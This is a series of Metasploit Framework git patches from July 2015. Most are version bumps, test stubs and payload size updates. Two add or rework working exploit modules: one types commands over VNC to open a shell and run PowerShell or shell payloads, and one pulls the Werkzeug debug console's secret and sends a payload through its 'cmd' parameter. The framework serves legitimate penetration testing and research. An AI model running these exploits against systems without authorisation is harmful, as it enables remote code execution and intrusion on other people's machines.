 6 files changed, 41 insertions(+), 22 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 219a800392..79f5d9d87d 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.11.3.pre.dev)
+    metasploit-framework (4.11.3)
       actionpack (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       bcrypt
@@ -20,14 +20,14 @@ PATH
       rubyzip (~> 1.1)
       sqlite3
       tzinfo
-    metasploit-framework-db (4.11.3.pre.dev)
+    metasploit-framework-db (4.11.3)
       activerecord (>= 4.0.9, < 4.1.0)
       metasploit-credential (= 1.0.0)
-      metasploit-framework (= 4.11.3.pre.dev)
+      metasploit-framework (= 4.11.3)
       metasploit_data_models (= 1.2.5)
       pg (>= 0.11)
-    metasploit-framework-pcap (4.11.3.pre.dev)
-      metasploit-framework (= 4.11.3.pre.dev)
+    metasploit-framework-pcap (4.11.3)
+      metasploit-framework (= 4.11.3)
       network_interface (~> 0.0.1)
       pcaprub
 
diff --git a/lib/metasploit/framework/core/version.rb b/lib/metasploit/framework/core/version.rb
index c02069540b..61e6beeffe 100644
--- a/lib/metasploit/framework/core/version.rb
+++ b/lib/metasploit/framework/core/version.rb
@@ -16,4 +16,4 @@ module Metasploit
       GEM_VERSION = Gem::Version.new(Metasploit::Framework::GEM_VERSION)
     end
   end
-end
\ No newline at end of file
+end
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index 1997dee21a..4714f35499 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -1,13 +1,43 @@
+require 'rbconfig'
+require 'yaml'
+
 module Metasploit
   module Framework
     module Version
+      # Determines the git hash for this source tree
+      #
+      # @return [String] the git hash for this source tree
+      def self.get_hash
+        @@git_hash ||= begin
+          root = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
+          version_yml = File.join(root, 'version.yml')
+          hash = ''
+
+          if File.exist?(version_yml)
+            version_info = YAML.load_file(version_yml)
+            hash = '-' + version_info['build_framework_rev']
+          else
+            # determine if git is installed
+            void = RbConfig::CONFIG['host_os'] =~ /mswin|mingw/ ? 'NUL' : '/dev/null'
+            git_installed = system("git --version >>#{void} 2>&1")
+
+            # get the hash of the HEAD commit
+            if git_installed && File.exist?(File.join(root, '.git'))
+              hash = '-' + `git rev-parse HEAD`[0, 8]
+            end
+          end
+          hash.strip
+        end
+      end
+
       MAJOR = 4
       MINOR = 11
       PATCH = 3
       PRERELEASE = 'dev'
+      HASH = get_hash
     end
 
-    VERSION = "#{Version::MAJOR}.#{Version::MINOR}.#{Version::PATCH}-#{Version::PRERELEASE}"
-    GEM_VERSION = VERSION.gsub('-', '.pre.')
+    VERSION = "#{Version::MAJOR}.#{Version::MINOR}.#{Version::PATCH}-#{Version::PRERELEASE}#{Version::HASH}"
+    GEM_VERSION = "#{Version::MAJOR}.#{Version::MINOR}.#{Version::PATCH}"
   end
 end
diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb
index fe54145d0d..c1701f52a5 100644
--- a/lib/msf/core/framework.rb
+++ b/lib/msf/core/framework.rb
@@ -11,6 +11,7 @@ require 'monitor'
 #
 
 require 'metasploit/framework/version'
+require 'msf/base/config'
 require 'msf/core'
 require 'msf/util'
 
@@ -33,16 +34,10 @@ class Framework
   Minor    = Metasploit::Framework::Version::MINOR
   Point    = Metasploit::Framework::Version::PATCH
   Release  = "-#{Metasploit::Framework::Version::PRERELEASE}"
-
-  if(Point)
-    Version  = "#{Major}.#{Minor}.#{Point}#{Release}"
-  else
-    Version  = "#{Major}.#{Minor}#{Release}"
-  end
+  Version  = Metasploit::Framework::VERSION
 
   Revision = "$Revision$"
 
-
   # Repository information
   RepoRevision        = ::Msf::Util::SVN.revision
   RepoUpdated         = ::Msf::Util::SVN.updated
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 4dd84dc7ba..66dbb0af92 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -418,7 +418,7 @@ class Core
     avdwarn = nil
 
     banner_trailers = {
-      :version     => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Metasploit::Framework::Core::GEM_VERSION} api:#{Metasploit::Framework::API::GEM_VERSION}]%clr",
+      :version     => "%yelmetasploit v#{Metasploit::Framework::VERSION}%clr",
       :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post",
       :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops",
       :free_trial  => "Free Metasploit Pro trial: http://r-7.co/trymsp",
diff --git a/spec/lib/msf/core/framework_spec.rb b/spec/lib/msf/core/framework_spec.rb
index 4786a8508a..7075f3281d 100644
--- a/spec/lib/msf/core/framework_spec.rb
+++ b/spec/lib/msf/core/framework_spec.rb
@@ -17,16 +17,10 @@ describe Msf::Framework do
   end
 
   describe "#version" do
-    CURRENT_VERSION = "4.11.3-dev"
-
     subject(:framework) do
       described_class.new
     end
 
-    it "should return the current version" do
-      framework.version.should == CURRENT_VERSION
-    end
-
     it "should return the Version constant" do
       described_class.const_get(:Version).should == framework.version
     end

From 1326a26be52e8dc34b4c5c9383bc5a687f001121 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 18:35:13 -0500
Subject: [PATCH 0715/1013] Do code cleanup

---
 .../exploits/multi/vnc/vnc_keyboard_exec.rb   | 97 ++++++++-----------
 1 file changed, 42 insertions(+), 55 deletions(-)

diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
index f12c1c2754..6b25a165fc 100644
--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -9,6 +9,9 @@ require 'rex/proto/rfb'
 class Metasploit3 < Msf::Exploit::Remote
 
   Rank = GreatRanking
+  WINDOWS_KEY = "\xff\xeb"
+  ENTER_KEY = "\xff\x0d"
+
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
@@ -24,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'          => [ 'xistence <xistence[at]0x90.nl>' ],
       'Privileged'      => false,
+      'DefaultOptions' => { 'WfsDelay' => 20 },
       'License'         => MSF_LICENSE,
       'Platform'       => %w{ win unix },
       'Targets'         =>
@@ -39,12 +43,12 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         Opt::RPORT(5900),
         OptString.new('PASSWORD', [ false, 'The VNC password']),
-        OptInt.new('TIMEWAIT', [ true, 'Time to wait for payload to be executed', 20])
+        OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
       ], self.class)
   end
 
 
-  def press_key( key )
+  def press_key(key)
     keyboard_key = "\x04\x01" # Press key
     keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
     keyboard_key << key # The keyboard key
@@ -53,49 +57,46 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
 
-  def release_key( key )
+  def release_key(key)
     keyboard_key = "\x04\x00" # Release key
     keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
     keyboard_key << key # The keyboard key
-    # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
+    # Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
     sock.put(keyboard_key)
   end
 
 
-  def exec_command( command )
+  def exec_command(command)
     values = command.chars.to_a
     values.each do |value|
       press_key("\x00#{value}")
       release_key("\x00#{value}")
     end
-    press_key(@enter_key)
+    press_key(ENTER_KEY)
   end
 
 
-  def start_cmdprompt
+  def start_cmd_prompt
     print_status("#{rhost}:#{rport} - Opening Run command")
     # Pressing and holding windows key for 1 second
-    press_key(@windows_key)
-    select(nil, nil, nil, 1)
+    press_key(WINDOWS_KEY)
+    Rex.select(nil, nil, nil, 1)
     # Press the "r" key
     press_key("\x00r")
     # Now we can release both keys again
     release_key("\x00r")
-    release_key(@windows_key)
+    release_key(WINDOWS_KEY)
     # Wait a second to open run command window
     select(nil, nil, nil, 1)
-    exec_command("cmd.exe")
+    exec_command('cmd.exe')
     # Wait a second for cmd.exe prompt to open
-    select(nil, nil, nil, 1)
+    Rex.select(nil, nil, nil, 1)
   end
 
 
   def exploit
 
     begin
-
-      @enter_key = "\xff\x0d"
-      @windows_key = "\xff\xeb"
       alt_key = "\xff\xe9"
       f2_key = "\xff\xbf"
       password = datastore['PASSWORD']
@@ -104,92 +105,78 @@ class Metasploit3 < Msf::Exploit::Remote
       vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
 
       unless vnc.handshake
-        print_error("#{rhost}:#{rport} - #{vnc.error}")
-        return
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
       end
 
-      unless password.nil?
+      if password.nil?
+        print_status("#{rhost}:#{rport} - Bypass authentication")
+        # The following byte is sent in case the VNC server end doesn't require authentication (empty password)
+        sock.put("\x10")
+      else
         print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
         if vnc.authenticate(password)
           print_status("#{rhost}:#{rport} - Authenticated")
         else
-          print_error("#{rhost}:#{rport} - #{vnc.error}")
-          return
+          fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
         end
-      else
-        print_status("#{rhost}:#{rport} - Bypass authentication")
-        # The following byte is sent in case the VNC server end doesn't require authentication (empty password)
-        sock.put("\x10")
       end
 
-
-
       # Send shared desktop
       unless vnc.send_client_init
-        print_error("#{rhost}:#{rport} - #{vnc.error}")
-        return
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
       end
 
       if target.name =~ /VBScript CMDStager/
-
-        start_cmdprompt
+        start_cmd_prompt
         print_status("#{rhost}:#{rport} - Typing and executing payload")
         execute_cmdstager({:flavor => :vbs, :linemax => 8100})
-
         # Exit the CMD prompt
-        exec_command("exit")
-
+        exec_command('exit')
       elsif target.name =~ /Powershell/
-
-        start_cmdprompt
+        start_cmd_prompt
         print_status("#{rhost}:#{rport} - Typing and executing payload")
-        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
+        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
         # Execute powershell payload and make sure we exit our CMD prompt
         exec_command("#{command} && exit")
-
       elsif target.name =~ /Linux/
-
-        print_status("#{rhost}:#{rport} - Opening \"Run Application\"")
+        print_status("#{rhost}:#{rport} - Opening 'Run Application'")
         # Press the ALT key and hold it for a second
         press_key(alt_key)
-        select(nil, nil, nil, 1)
-
+        Rex.select(nil, nil, nil, 1)
         # Press F2 to start up "Run application"
         press_key(f2_key)
-
         # Release ALT + F2
         release_key(alt_key)
         release_key(f2_key)
-
         # Wait a second for "Run application" to start
-        select(nil, nil, nil, 1)
-
+        Rex.select(nil, nil, nil, 1)
         # Start a xterm window
         print_status("#{rhost}:#{rport} - Opening xterm")
-        exec_command("xterm")
-
+        exec_command('xterm')
         # Wait a second for "xterm" to start
-        select(nil, nil, nil, 1)
-
+        Rex.select(nil, nil, nil, 1)
         # Execute our payload and exit (close) the xterm window
         print_status("#{rhost}:#{rport} - Typing and executing payload")
         exec_command("nohup #{payload.encoded} &")
-        exec_command("exit")
+        exec_command('exit')
       end
 
-      # Wait up to X seconds, else might timeout/disconnect before full payload is typed
-      select(nil, nil, nil, datastore['TIMEWAIT'])
+      (datastore['TIME_WAIT']).times do
+        Rex.sleep(1)
+
+        # Success! session is here!
+        break if session_created?
+      end
 
-      handler
     rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
-      print_error("#{rhost}:#{rport} - #{e.message}")
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
     ensure
       disconnect
     end
   end
 
   def execute_command(cmd, opts = {})
-      exec_command(cmd)
+    exec_command(cmd)
   end
 
 end

From 499572845946956d8735531898150aef962d8a48 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 18:37:24 -0500
Subject: [PATCH 0716/1013] Modify arkeia_agent_exec ranking

---
 modules/exploits/multi/misc/arkeia_agent_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 2e470675f7..605959a4ff 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::HttpServer::HTML

From 6c6a778218f9d334d2aca78ecf5ff5a04a650a7c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 18:38:25 -0500
Subject: [PATCH 0717/1013] Modify arkeia_agent_exec title

---
 modules/exploits/multi/misc/arkeia_agent_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 605959a4ff..0087620e60 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'WD Arkeia Remote Code Execution',
+      'Name'        => 'Western Digital Arkeia Remote Code Execution',
       'Description' => %q{
         This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below.
         The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are

From 677cd97cc2f651e3c4861b28de1fee25952ac515 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 18:39:11 -0500
Subject: [PATCH 0718/1013] Update information

---
 modules/exploits/multi/vnc/vnc_keyboard_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
index 6b25a165fc..c87b0a82f0 100644
--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'VNC Keyboard Exec',
+      'Name'            => 'VNC Keyboard Remote Code Execution',
       'Description'     => %q{
         This module exploits VNC servers by sending virtual keyboard keys and executing
         a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager

From 63e91fa50f2e6563aea73617c68474ba7b3f0f98 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 18:46:06 -0500
Subject: [PATCH 0719/1013] Add reference

---
 modules/exploits/multi/vnc/vnc_keyboard_exec.rb | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
index c87b0a82f0..e7e2d392b0 100644
--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -36,6 +36,10 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
           [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
         ],
+      'References'     =>
+        [
+          [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
+        ],
       'DisclosureDate'  => 'Jul 10 2015',
       'DefaultTarget'   => 0))
 

From 8d52c265d92f382e9dbddf1a5d068555230a2221 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 18:46:27 -0500
Subject: [PATCH 0720/1013] Delete wfsdelay

---
 modules/exploits/multi/vnc/vnc_keyboard_exec.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
index e7e2d392b0..9c8552c3fa 100644
--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'          => [ 'xistence <xistence[at]0x90.nl>' ],
       'Privileged'      => false,
-      'DefaultOptions' => { 'WfsDelay' => 20 },
       'License'         => MSF_LICENSE,
       'Platform'       => %w{ win unix },
       'Targets'         =>

From 5a045677bcbf6450fc10b47e0c45108797796bb7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 18:48:46 -0500
Subject: [PATCH 0721/1013] Add waiting message

---
 modules/exploits/multi/vnc/vnc_keyboard_exec.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
index 9c8552c3fa..b22a3d9646 100644
--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -164,6 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
         exec_command('exit')
       end
 
+      print_status("#{rhost}:#{rport} - Waiting for session...")
       (datastore['TIME_WAIT']).times do
         Rex.sleep(1)
 

From bff92f2304cc466bf79d429b7cc45cc354b56429 Mon Sep 17 00:00:00 2001
From: h00die <mike@shorebreaksecurity.com>
Date: Fri, 10 Jul 2015 21:13:12 -0400
Subject: [PATCH 0722/1013] Initial add

---
 .../exploits/multi/http/werkzeug_debug_rce.rb | 79 +++++++++++++++++++
 1 file changed, 79 insertions(+)

diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb
index e69de29bb2..3a9433fcf7 100644
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -0,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+      'Name'        => 'Werkzeug Debug Shell Command Execution',
+      'Description' => %q{
+        This module will exploit the Werkzeug debug console to put down a
+        python shell.  This debugger "must never be used on production
+        machines", but sometimes slips passed testing.
+        Tested against:
+            0.9.6 on Debian
+            0.10  on CentOS
+      },
+      'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
+      'References'  =>
+          [
+            [ 'Website', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
+          ],
+      'License'     => MSF_LICENSE,
+      'Platform'       => ['python'],
+      'Targets'        => [[ 'werkzeug 0.10 and older', { }]],
+      'Arch'           => ARCH_PYTHON,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 28 2015',
+    )
+    register_options(
+      [
+        OptString.new('URI',[true,'URI to the console','/console'])
+      ], self.class
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(datastore['URI'])
+    })
+    #https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/debug/tbtools.py#L67
+    if (res and res.body =~ /Brought to you by <strong class="arthur">DON'T PANIC<\/strong>, your\n        friendly Werkzeug powered traceback interpreter./)
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    #first we need to get the SECRET code
+    secret = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(datastore['URI'])
+    })
+    if (secret and secret.body =~ /SECRET = "([a-zA-Z0-9]{20})";/)
+      secret = secret.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
+      vprint_status("Secret Code: #{secret}")
+      res = send_request_cgi({
+          'method'   => 'GET',
+          'uri'      => normalize_uri(datastore['URI']),
+          'vars_get' => {
+              '__debugger__' => 'yes',
+              'cmd' => payload.encoded,
+              'frm' => '0',
+              's' => secret
+          }
+      })
+    else
+      print_error("Secret code not detected.")
+    end
+  end
+end
+

From 226137896e187565ddb4d120cf482ec6d3a8ff91 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 10 Jul 2015 22:30:20 -0500
Subject: [PATCH 0723/1013] updated cached payload sizes

---
 modules/payloads/singles/windows/meterpreter_bind_tcp.rb        | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_http.rb    | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_https.rb   | 2 +-
 .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb    | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_tcp.rb     | 2 +-
 modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb    | 2 +-
 .../payloads/singles/windows/x64/meterpreter_reverse_http.rb    | 2 +-
 .../payloads/singles/windows/x64/meterpreter_reverse_https.rb   | 2 +-
 .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb         | 2 +-
 modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +-
 10 files changed, 10 insertions(+), 10 deletions(-)

diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
index e46cfa3aec..068ee6e037 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 884782
+  CachedSize = 885806
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
index 0feb5e1780..5ed6e68ff6 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 885826
+  CachedSize = 886850
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index 714afa1c61..c0ea30893b 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 885826
+  CachedSize = 886850
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
index 16d8395e1c..623bc74a10 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 884782
+  CachedSize = 885806
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
index 1d84ccbd5d..150c8c3132 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit3
 
-  CachedSize = 884782
+  CachedSize = 885806
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
index d9d1ffbe47..ea5b654e42 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1104434
+  CachedSize = 1105970
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index b84ce4f7fb..2a41b6f8b0 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1105478
+  CachedSize = 1107014
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index fe0e6c1977..055d58d24e 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1105478
+  CachedSize = 1107014
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
index f843d31260..eadb359933 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1104434
+  CachedSize = 1105970
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
index 3c0e1efce7..36d632b24b 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1104434
+  CachedSize = 1105970
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

From b1208e1337cf2be8547651c228e83de827fbda95 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 00:16:48 -0500
Subject: [PATCH 0724/1013] Pending rspec

---
 .../core/exploit/browser_autopwnv2_spec.rb    | 23 ++++++++++++++++---
 1 file changed, 20 insertions(+), 3 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
index eadd5f8394..8b87348d19 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
@@ -53,7 +53,13 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   end
 
   def create_fake_job(id)
-    [id.to_s, double('job')]
+    ctx = double('ctx')
+    handler = create_fake_windows_meterpreter
+    allow(ctx).to receive(:first).and_return(handler)
+    job = [id.to_s, double('job')]
+    allow(job).to receive(:ctx).and_return(ctx)
+
+    job
   end
 
   def create_fake_exploit(opts={})
@@ -555,7 +561,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
-  describe '#start_payload_listeners' do
+  skip '#start_payload_listeners' do
   end
 
   describe '#parse_rank' do
@@ -650,7 +656,8 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
-  describe '#select_payload' do
+  skip '#select_payload' do
+    
   end
 
   describe '#start_exploits' do
@@ -767,5 +774,15 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
+  skip '#configure_job_output' do
+  end
+
+  describe '#session_count' do
+    it 'returns the total session count' do
+      subject.instance_variable_set(:@payload_job_ids, job_ids)
+      expect(subject.session_count).to eq(0)
+    end
+  end
+
 
 end
\ No newline at end of file

From 63005a3b92b9e8dd6ed835caf9b37070bf58544a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 11 Jul 2015 00:28:55 -0500
